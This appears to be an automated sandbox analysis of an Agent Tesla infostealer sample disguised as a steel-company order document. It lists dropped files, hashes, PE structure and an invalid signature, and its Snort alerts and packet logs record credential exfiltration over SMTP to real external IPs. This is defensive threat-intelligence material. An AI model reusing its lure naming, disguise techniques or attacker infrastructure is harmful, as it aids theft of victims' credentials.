Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"><g color="#bebebe" font-weight="400" fill="#474747"><path d="M1.75 4C.798 4 0 4.798 0 5.75v4.5C0 11.202.798 12 1.75 12h.125l-.781 1.563L.375 15h9.25l-.719-1.437L8.125 12h.125c.952 0 1.75-.798 1.75-1.75v-4.5C10 4.798 9.202 4 8.25 4zM2 6h6v4H2z" style="line-height:normal;-inkscape-font-specification:Sans;text-indent:0;text-align:start;text-decoration-line:none;text-transform:none;marker:none" font-family="Sans" overflow="visible"/><path d="M7.75 1C6.798 1 6 1.798 6 2.75V3h8v4h-3v3.25c0 .66-.252 1.27-.656 1.75h5.28l-1.5-3h.126C15.202 9 16 8.202 16 7.25v-4.5C16 1.798 15.202 1 14.25 1z" style="line-height:normal;text-indent:0;text-align:start;text-decoration-line:none;text-transform:none;marker:none" font-family="Andale Mono" overflow="visible"/></g></svg>

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Jansis\Grusendes\Stoser\Unappealingness\Dermobranchiate\Teknologiarbejderne5.Int

Download File

Process:	C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	33026
Entropy (8bit):	3.9996757943834025
Encrypted:	false
SSDEEP:	768:lHKaguobUqQBVK2YBYLZm+sMFIUfK1WvJvsefrM9QVUDQqIPbyq:lqag9bBOWYL0+sMdfCwJRQ99QqIP+q
MD5:	623EFE7EB234A081485070FFFAA64F7B
SHA1:	FED843582333608F0638AA899FCF160AE4539EA9
SHA-256:	B838758AF694DBEF9C8F5B57EEC38F0C66A35CF27F4FEA9A3A5230A586B0D9BB
SHA-512:	27E1306E111F0DFF7E4976D3AAB4C1208A57EE99B8E8570564DDAFBF52F881F2AB8290DC66F7850C3B07BE4B33BA12D6EB383744CA8BD5948ED7580B86C90265
Malicious:	false
Preview:	E2DA6B6570CB656C31973A3A41D7656176C046696EC041286F8572342289206922957838329530303295302C22CC20302E8570203289206922912C206B8530783A952C206B8530296B8B723322FC6B6570CB656C31973A3A54CC727477C46C416EC96F632ACC302C6B8530783395303032952C206B853078319530302E85692032DD34302BD52E7233FC6B6570CB656C31973A3A51C074466BC965506DCC6E7467D7286970962C206B8531343091202C22CC20302ECC20302BCC2E7230FC6B6570CB656C31973A3A50C0616444CC6C652ACC72332E85692070942C206B8530783395303032952C2A6B85302C22CC20302BCC2E7230FC757367D73332389F43616EC957696CC16F7752D76F63438D697233852C6922952C6922952C206B85302C22CC20302BFC9B715026376949DB424CE98BCF54DA6B283889D10B3E26CAA11F430BC4FF7FE2BF2B90EDA47C6F063B029564ABE5FF46ECD9056FDB8B32097C888F28EFFFFE3A7739E9F7922BEF389C58742607ACEB6DCF0FB692B411A0D5A064627072128CBAE404432BAE4F9BEA51626F30190638478411157EB2ACF6750867A41D8903CC2EABE857CBF331E4301C1C3700F32339BF5FF03DF9EE36352CD6C05988D9F2D0E366E73F114377C7A94C1810BAB28EC619C4FF40FB3F0DDA314197CBB51F09A6EB5C0B497B978A9D9394795441B741

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Jansis\undertaking.Emp

Download File

Process:	C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe
File Type:	data
Category:	dropped
Size (bytes):	75601
Entropy (8bit):	7.596335529805053
Encrypted:	false
SSDEEP:	1536:KlWX5dQqTczvX6odPXtl4AqykbknyUiCH/ZC4qyIfP1BMj/uvDtL:KGd/Qj6QXtl4AxEkyUiy/ZC4qvP1B4ut
MD5:	0A2A7A577FFC1CBD0CD4980A1FA68B31
SHA1:	02674F0BEF0FC4474605CB1027B89EC37A550534
SHA-256:	9927E32AB7E685B6B8F3BC0AE87B35AEE629E95AE3A7E5FB492B65A808019B3D
SHA-512:	E6FFE90D38A80FABA241B87CD975FAB1B2C4D9A2408926AF2E4D2B141FA1556CD2245814F705C30A268401B6D4612B5D728639956B18E670899AF480B9783CAD
Malicious:	false
Preview:	....Chaa..h....Z2..Ql.{.!}.......:...r`A...A.....#.+u)z.. 0..s...+$.(R._......Z.fO.......t.zh....._......p[........8..>...y...vh>c.B.4.......b..n&...........s)T\|..Ir...WB....D.c....._..f.g..:.....a.U.G6..{.....0.......O.M.>.4X..h0.......j<.5...?...D.K.DT...g.6p..4...OQ.`......,[.(#.cs6B......eV.z...b.M.4.Z.rR...^(....LNX-..4.... .+...gI.Dyq.6..S......=.....+z...4.F.9.Ci..j5.W.m./...........eU3......t.f:."(.x'.c.........DcOB..@.p..~...er.........k.r.<<...ig..[..0.......e.........5....]t!.0PE.9.........\|:..&.j8..6...'..X....Lq.k.....[......`...b"i..+.......l..;.v..tq............8...aXa..U.c.k.z.C9C.L...P.[..ld..p.B.g..`..g=...#..N...K.M...;.f..Nh7+..sR......g.\|oG*(.....Z<.-#>...Ub...F.@s5./..?E3.O....$o.7...0..[.........1.J..C..."c"n....<.g.Vq.".D.?.Y....#...V..Q#.Udl?e...&Q....6.........eA..6.6A......_G{...{..2..>....!....HW.{..E=...u.c...U.t.........._).:.......9..R..?.(.1T.%.T......;.Mz.f. .x..Z.cO.../!....x..R.J.....3Kx.

\Device\ConDrv

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	30
Entropy (8bit):	3.964735178725505
Encrypted:	false
SSDEEP:	3:IBVFBWAGRHneyy:ITqAGRHner
MD5:	9F754B47B351EF0FC32527B541420595
SHA1:	006C66220B33E98C725B73495FE97B3291CE14D9
SHA-256:	0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
SHA-512:	C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
Malicious:	false
Preview:	NordVPN directory not found!..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.446552283541879
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe
File size:	152504
MD5:	297cee2e9339ab19cb96a073ca8ba85f
SHA1:	b5467307b8d1bc03ca9ed311b2ca06a9806d3b47
SHA256:	9d0562b4cdc6c8a65119209d1f9dc4a06ce297afe2636b68a6772a470b0301a2
SHA512:	70852b7fb93198aaacfb124d17b4995c1f502ddf9df138ced15db4909e85287052a531c780c27dac54be66af4d2bff0c601f6a074cb4428f374b0f9ce85ebfd7
SSDEEP:	3072:a1T//IHWyWJADJuH1btqoqXpEszuTYT3Nf5hqDNPOTjEFMdj3r:M//I2y3A5tqPXp7qE9qpPOT8Mdv
TLSH:	D2E3E19177A0F123C8E24F3119AB9B6B9F7F9A1018501643C328AB8B7D31786FC1F656
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!.G.@n..@n..@n./O1..@n..@o.K@n./O3..@n..c^..@n.+Fh..@n.Rich.@n.........................PE..L...e..V.................b....:....

File Icon


Icon Hash:	f8ce9fb3a386ecf0

Static PE Info

General

Entrypoint:	0x40327d
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x567F8465 [Sun Dec 27 06:25:41 2015 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	d4b94e8ee3f620a89d114b9da4b31873

Authenticode Signature

Signature Valid:	false
Signature Issuer:	OU="Udmundingens Administrator Jernvrk ", E=Leksikalisere@Millihg15.Hjl, O=Klasseundervisningerne, L=Rudhall, S=England, C=GB
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	14/10/2021 18:21:36 13/10/2024 18:21:36
Subject Chain	OU="Udmundingens Administrator Jernvrk ", E=Leksikalisere@Millihg15.Hjl, O=Klasseundervisningerne, L=Rudhall, S=England, C=GB
Version:	3
Thumbprint MD5:	989D958BBA75F9ED140C17FF87CE9B78
Thumbprint SHA-1:	9D1DFBA4F47ACE4298D7058D82020DFC8C5FCFD6
Thumbprint SHA-256:	7E2D22EF8F2D6E9356AA4CF38ACDCF3258CB3350B3554253D08F5DE9C8AA78D3
Serial:	A5FAA65B4F605A1F

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebp
push esi
push 00000020h
xor ebp, ebp
pop esi
mov dword ptr [esp+0Ch], ebp
push 00008001h
mov dword ptr [esp+0Ch], 0040A300h
mov dword ptr [esp+18h], ebp
call dword ptr [004080B0h]
call dword ptr [004080ACh]
cmp ax, 00000006h
je 00007FDE3881E113h
push ebp
call 00007FDE38821256h
cmp eax, ebp
je 00007FDE3881E109h
push 00000C00h
call eax
push ebx
push edi
push 0040A2F4h
call 00007FDE388211D3h
push 0040A2ECh
call 00007FDE388211C9h
push 0040A2E0h
call 00007FDE388211BFh
push 00000009h
call 00007FDE38821224h
push 00000007h
call 00007FDE3882121Dh
mov dword ptr [007A8A44h], eax
call dword ptr [00408044h]
push ebp
call dword ptr [004082A8h]
mov dword ptr [007A8AF8h], eax
push ebp
lea eax, dword ptr [esp+34h]
push 000002B4h
push eax
push ebp
push 0079FF00h
call dword ptr [0040818Ch]
push 0040A2C8h
push 007A7A40h
call 00007FDE38820E0Ah
call dword ptr [004080A8h]
mov ebx, 007B3000h
push eax
push ebx
call 00007FDE38820DF8h
push ebp
call dword ptr [00408178h]

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x84bc	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x3d8000	0x6ea8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x24cc8	0x6f0	.data
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2b8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6155	0x6200	False	0.6741470025510204	data	6.472221311938333	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x1370	0x1400	False	0.441015625	data	5.105712848520416	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x39eb38	0x600	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x3a9000	0x2f000	0x0	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x3d8000	0x6ea8	0x7000	False	0.545166015625	data	5.216552612077974	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x3d8388	0x25a8	data	English	United States
RT_ICON	0x3da930	0x10a8	data	English	United States
RT_ICON	0x3db9d8	0xea8	data	English	United States
RT_ICON	0x3dc880	0x8a8	dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 15900575, next used block 16030362	English	United States
RT_ICON	0x3dd128	0x668	data	English	United States
RT_ICON	0x3dd790	0x568	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0x3ddcf8	0x468	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0x3de160	0x2e8	dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 2542864384, next used block 7378839	English	United States
RT_ICON	0x3de448	0x128	GLS_BINARY_LSB_FIRST	English	United States
RT_DIALOG	0x3de570	0x100	data	English	United States
RT_DIALOG	0x3de670	0xf8	data	English	United States
RT_DIALOG	0x3de768	0xa0	data	English	United States
RT_DIALOG	0x3de808	0x60	data	English	United States
RT_GROUP_ICON	0x3de868	0x84	data	English	United States
RT_VERSION	0x3de8f0	0x278	data	English	United States
RT_MANIFEST	0x3deb68	0x33f	XML 1.0 document, ASCII text, with very long lines, with no line terminators	English	United States

Imports

DLL	Import
KERNEL32.dll	SetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, MoveFileW, SetFileAttributesW, GetCurrentProcess, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, CopyFileW, CompareFileTime, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, LoadLibraryW, GetProcAddress, GetModuleHandleA, ExpandEnvironmentStringsW, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, GlobalFree, lstrcmpW, GlobalAlloc, WaitForSingleObject, GlobalUnlock, GetDiskFreeSpaceW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
USER32.dll	GetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, GetDC, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, LoadImageW, SetWindowLongW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, SetTimer, FindWindowExW, SendMessageTimeoutW, SetForegroundWindow
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
ADVAPI32.dll	RegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.11.20208.91.199.224498425872840032 10/05/22-09:37:55.889187	TCP	2840032	ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2	49842	587	192.168.11.20	208.91.199.224
192.168.11.20208.91.199.224498425872851779 10/05/22-09:37:55.889187	TCP	2851779	ETPRO TROJAN Agent Tesla Telegram Exfil	49842	587	192.168.11.20	208.91.199.224
192.168.11.20208.91.199.224498425872030171 10/05/22-09:37:55.889092	TCP	2030171	ET TROJAN AgentTesla Exfil Via SMTP	49842	587	192.168.11.20	208.91.199.224
192.168.11.20208.91.199.224498425872839723 10/05/22-09:37:55.889092	TCP	2839723	ETPRO TROJAN Win32/Agent Tesla SMTP Activity	49842	587	192.168.11.20	208.91.199.224

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 5, 2022 09:36:16.828092098 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:17.066210032 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:17.066565990 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:17.067675114 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:17.306513071 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:17.306626081 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:17.306694984 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:17.306708097 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:17.306794882 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:17.306870937 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:17.306967020 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:17.544363976 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:17.544440985 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:17.544611931 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:17.544852018 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:17.544922113 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:17.544976950 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:17.545023918 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:17.545041084 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:17.545089960 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:17.545118093 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:17.545162916 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:17.545197964 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:17.545300961 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:17.545360088 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:17.782768965 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:17.782907963 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:17.782941103 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:17.782973051 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:17.783035040 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:17.783083916 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:17.783133984 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:17.783134937 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:17.783200979 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:17.783225060 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:17.783269882 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:17.783304930 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:17.783329010 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:17.783387899 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:17.783435106 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:17.783477068 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:17.783488035 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:17.783548117 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:17.783549070 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:17.783601999 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:17.783617973 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:17.783680916 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:17.783683062 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:17.783746004 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:17.783797979 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:17.783859968 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:17.783941984 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.021212101 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.021565914 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.021629095 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.021677017 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.021723032 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.021894932 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.021945953 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.021962881 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.022028923 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.022078037 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.022098064 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.022147894 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.022198915 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.022232056 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.022254944 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.022284985 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.022325039 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.022367954 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.022384882 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.022443056 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.022448063 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.022536993 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.022552967 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.022613049 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.022643089 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.022671938 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.022696018 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.022737980 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.022768974 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.022800922 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.022851944 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.022897959 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.022913933 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.022963047 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.022965908 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.023025036 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.023049116 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.023087978 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.023119926 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.023148060 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.023200035 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.023246050 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.023248911 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.023298979 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.023313046 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.023369074 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.023370981 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.023430109 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.023444891 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.023495913 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.023544073 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.023588896 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.023642063 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.023722887 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.261183023 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.261686087 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.261718988 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.261794090 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.261842966 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.261918068 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.261965990 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.262006044 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.262021065 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.262028933 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.262090921 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.262176037 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.262198925 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.262370110 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.262406111 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.262484074 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.262537003 CEST	49837	80	192.168.11.20	103.156.93.29
Oct 5, 2022 09:36:18.262554884 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.262617111 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.262665033 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.262712002 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.262759924 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.262806892 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.262852907 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.262900114 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.262945890 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.262991905 CEST	80	49837	103.156.93.29	192.168.11.20
Oct 5, 2022 09:36:18.263039112 CEST	80	49837	103.156.93.29	192.168.11.20
